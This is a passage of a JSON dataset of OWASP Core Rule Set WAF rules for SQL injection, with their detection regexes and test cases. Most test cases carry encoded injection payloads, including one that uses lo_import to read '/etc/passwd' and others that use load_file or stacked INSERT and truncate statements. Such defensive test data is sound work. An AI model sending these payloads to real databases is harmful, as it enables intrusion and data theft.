%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects MySQL and PostgreSQL stored procedure/function injections", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=procedure%20analyse%20%28" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=procedure%20analyse%20%28" } ] }, { "description": "Detects MySQL and PostgreSQL stored procedure/function injections", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=exec+%28%40%0A" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=exec+%28%40%0A" } ] }, { "description": "Detects MySQL and PostgreSQL stored procedure/function injections", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=declare+%40b%0A" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=declare+%40b%0A" } ] }, { "description": "Detects MySQL and PostgreSQL stored procedure/function injections", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=DECLARE%2F%2A%2A%2F%40x%0A" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=DECLARE%2F%2A%2A%2F%40x%0A" } ] }, { "description": "Detects PostgreSQL data conversion with ::int", "test_id": 5, "request": { "method": "GET", "uri": "/get/index.php?id=password::int", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=password::int" } ] }, { "description": "Detects PostgreSQL data conversion with ::bool", "test_id": 6, "request": { "method": "GET", "uri": "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "no=2&id=1%27%20and%20unistr(password)::bool--" } ] }, { "description": "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910", "test_id": 7, "request": { "method": "GET", "uri": "/get/index.php?id=div(23,-2)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=div(23,-2)" } ] }, { "description": "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910", "test_id": 8, "request": { "method": "GET", "uri": "/get/index.php?id=div+(23.23+,+2)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=div+(23.23+,+2)" } ] }, { "description": "Detects PostgreSQL bypass attempt lo_import'( - issue #2912", "test_id": 9, "request": { "method": "GET", "uri": "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" } ] }, { "description": "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924", "test_id": 10, "request": { "method": "GET", "uri": "/get/index.php?id=lo_get(16400)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=lo_get(16400)" } ] }, { "description": "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924", "test_id": 11, "request": { "method": "GET", "uri": "/get/index.php?id=function(foo)::text", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=function(foo)::text" } ] }, { "description": "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924", "test_id": 12, "request": { "method": "GET", "uri": "/get/index.php?id=function(foo)::bigint", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=function(foo)::bigint" } ] }, { "description": "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924", "test_id": 13, "request": { "method": "GET", "uri": "/get/index.php?id=function(foo)::double%20precision", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942320 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=function(foo)::double%20precision" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 405, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)create[\\s\\x0b]+(?:function|procedure)[\\s\\x0b]*?[0-9A-Z_a-z]+[\\s\\x0b]*?\\([\\s\\x0b]*?\\)[\\s\\x0b]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\\s\\x0b]*?[0-9A-Z_a-z]+|iv[\\s\\x0b]*?\\([\\+\\-]*[\\s\\x0b\\.0-9]+,[\\+\\-]*[\\s\\x0b\\.0-9]+\\))|exec[\\s\\x0b]*?\\([\\s\\x0b]*?@|(?:lo_(?:impor|ge)t|procedure[\\s\\x0b]+analyse)[\\s\\x0b]*?\\(|;[\\s\\x0b]*?(?:declare|open)[\\s\\x0b]+[\\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\\s\\x0b]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)", "actions": [ { "act_name": "id", "lineno": 406, "act_quote": "no_quote", "act_arg": "942320", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 407, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 408, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 409, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 410, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 410, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 411, "act_quote": "quotes", "act_arg": "Detects MySQL and PostgreSQL stored procedure/function injections", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 412, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 413, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 414, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 415, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 416, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 417, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 418, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 419, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 420, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 421, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 422, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 423, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 424, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 405 } }, { "rule_id": "942350", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)create[\\s\\x0b]+function[\\s\\x0b].+[\\s\\x0b]returns|;[\\s\\x0b]*?(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\\b[\\s\\x0b]*?[\\(\\[]?[0-9A-Z_a-z]{2,}", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects MySQL UDF injection and other data/structure manipulation attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "MySQL UDF injection and other data/structure manipulation", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942350 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" } ] }, { "description": "Fix for FP reported in GitHub issue 1587", "test_id": 2, "request": { "method": "GET", "uri": "/get?var=%3Binsertion_424242", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942350 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%3Binsertion_424242" } ] }, { "description": "MySQL create function injection", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942350 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" } ] }, { "description": "Status Page Test - MySQL injection with ;truncate[xx", "test_id": 4, "request": { "method": "GET", "uri": "/get?test=;truncate[xx", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942350 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=;truncate[xx" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 431, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)create[\\s\\x0b]+function[\\s\\x0b].+[\\s\\x0b]returns|;[\\s\\x0b]*?(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\\b[\\s\\x0b]*?[\\(\\[]?[0-9A-Z_a-z]{2,}", "actions": [ { "act_name": "id", "lineno": 432, "act_quote": "no_quote", "act_arg": "942350", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 433, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 434, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 435, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 436, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 436, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 437, "act_quote": "quotes", "act_arg": "Detects MySQL UDF injection and other data/structure manipulation attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 438, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 439, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 440, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 441, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 442, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 443, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 444, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 445, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 446, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 447, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 448, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 449, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 450, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 431 } }, { "rule_id": "942360", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\\s\\x0b]+(?:char|group_concat|load_file)\\b[\\s\\x0b]*\\(?|end[\\s\\x0b]*?\\);)|[\\s\\x0b\\(]load_file[\\s\\x0b]*?\\(|[\\\"'`][\\s\\x0b]+regexp[^0-9A-Z_a-z]|[\\\"'0-9A-Z_-z][\\s\\x0b]+as\\b[\\s\\x0b]*[\\\"'0-9A-Z_-z]+[\\s\\x0b]*\\bfrom|^[^A-Z_a-z]+[\\s\\x0b]*?(?:(?:(?:(?:cre|trunc)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\\s\\x0b]+[0-9A-Z_a-z]+|u(?:pdate[\\s\\x0b]+[0-9A-Z_a-z]+|nion[\\s\\x0b]*(?:all|(?:sele|distin)ct)\\b)|alter[\\s\\x0b]*(?:a(?:(?:ggregat|pplication[\\s\\x0b]*rol)e|s(?:sembl|ymmetric[\\s\\x0b]*ke)y|u(?:dit|thorization)|vailability[\\s\\x0b]*group)|b(?:roker[\\s\\x0b]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\\s\\x0b]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\\s\\x0b]*group|in)))|m(?:a(?:s(?:k|ter[\\s\\x0b]*key)|terialized)|e(?:ssage[\\s\\x0b]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\\s\\x0b]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\\s\\x0b]*schema|srobject))\\b)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects concatenated basic SQL injection and SQLLFI attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "concatenated basic SQL injection and SQLLFI", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select Char(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select Char(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT CHAR(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT CHAR(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT GROUP_CONCAT(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT GROUP_CONCAT(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT group_cOnCat(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT group_cOnCat(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select load_file(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select load_file(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "` AS `edit_user_id` from" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "` AS `edit_user_id` from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%60+REGEXP%20" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%60+REGEXP%20" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "` AS `OXTIMESTAMP` from" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "` AS `OXTIMESTAMP` from" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "(load_file(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "(load_file(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "` AS `documentType` FROM" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "` AS `documentType` FROM" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT load_file(" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT load_file(" } ] }, { "description": "Detects concatenated basic SQL injection and SQLLFI attempts", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "6 As\" from" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "6 As\" from" } ] }, { "description": "GH issue 1580", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": ", aside from" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": ", aside from" } ] }, { "description": "GH issue 1605", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": 